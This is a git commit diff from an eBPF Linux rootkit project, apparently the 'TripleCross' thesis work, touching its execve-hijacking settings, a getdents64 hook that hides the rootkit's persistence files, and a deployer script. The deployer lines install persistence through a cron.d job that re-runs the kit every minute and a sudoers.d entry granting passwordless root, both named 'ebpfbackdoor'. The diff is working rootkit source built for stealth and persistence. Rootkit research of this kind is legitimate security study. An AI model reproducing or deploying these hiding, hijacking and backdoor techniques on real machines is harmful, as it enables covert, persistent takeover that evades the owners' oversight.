Completed chapter 4

2025-12-28 12:23:06 +08:00 · 2022-06-16 20:38:15 -04:00
parent 7f4209299c
commit 2b719ff0a5
13 changed files with 21296 additions and 21655 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -24,7 +24,7 @@
 //EXECUTION HIJACKING

 #define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
-#define EXEC_HIJACK_ACTIVE_TEMP 1
+#define EXEC_HIJACK_ACTIVE_TEMP 0
 #define TASK_COMM_NAME_RESTRICT_HIJACK "bash"
 #define TASK_COMM_RESTRICT_HIJACK_ACTIVE 1

--- a/src/ebpf/include/bpf/fs.h
+++ b/src/ebpf/include/bpf/fs.h
@@ -278,8 +278,6 @@ static __always_inline int handle_tp_sys_exit_getdents64(struct sys_getdents64_e
        return 0;
    }

-
-    struct linux_dirent64 *d_entry;
    __u64 *stored_data = bpf_map_lookup_elem(&fs_dir_log, &pid_tgid);
    if (stored_data == NULL){
        //Nothing for this process
@@ -302,13 +300,11 @@ static __always_inline int handle_tp_sys_exit_getdents64(struct sys_getdents64_e
        }
        struct linux_dirent64 *d_entry = (struct linux_dirent64*)(d_entry_base_addr + curr_offset);
        __u16 d_reclen;
-        __u16 d_name_len;
        char d_name[128];
        bpf_probe_read(&d_reclen, sizeof(__u16), &d_entry->d_reclen); 
        //bpf_printk("Record length: %d\n", d_reclen);
        char d_type;
        bpf_probe_read(&d_type, sizeof(d_type), &d_entry->d_type);
-        d_name_len = d_reclen - 2 - (offsetof(struct linux_dirent64, d_name));
        int err = bpf_probe_read_user(&d_name, 128, d_entry->d_name);
        if (err!=0){
            //Ignore this entry, error
@@ -337,7 +333,7 @@ static __always_inline int handle_tp_sys_exit_getdents64(struct sys_getdents64_e
        }
        
        //This hides files which achieve the persistence of the rootkit, so better not to be shown
-        bpf_printk("FILE: d_reclen: %d, d_name_len: %d, %s", d_reclen, d_name_len, d_name);
+        bpf_printk("FILE: d_reclen: %d, d_name: %s", d_reclen, d_name);
        if(previous_dir != NULL){
            if(str_n_compare(d_name, sizeof(SECRET_FILE_PERSISTENCE_NAME)-1, SECRET_FILE_PERSISTENCE_NAME, sizeof(SECRET_FILE_PERSISTENCE_NAME)-1, sizeof(SECRET_FILE_PERSISTENCE_NAME)-1)==0){
                __u16 prev_reclen;
--- a/src/helpers/deployer.sh
+++ b/src/helpers/deployer.sh
@@ -39,7 +39,7 @@ quiet(){

 #Start of script
 echo "*******************************************************\n"
-echo "************************* TFG *************************\n"
+echo "********************* TripleCross *********************\n"
 echo "*******************************************************\n"
 echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
@@ -59,7 +59,7 @@ else
   /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi

-## Install a backdoor in cron.d
+## Persistence
 echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
 echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor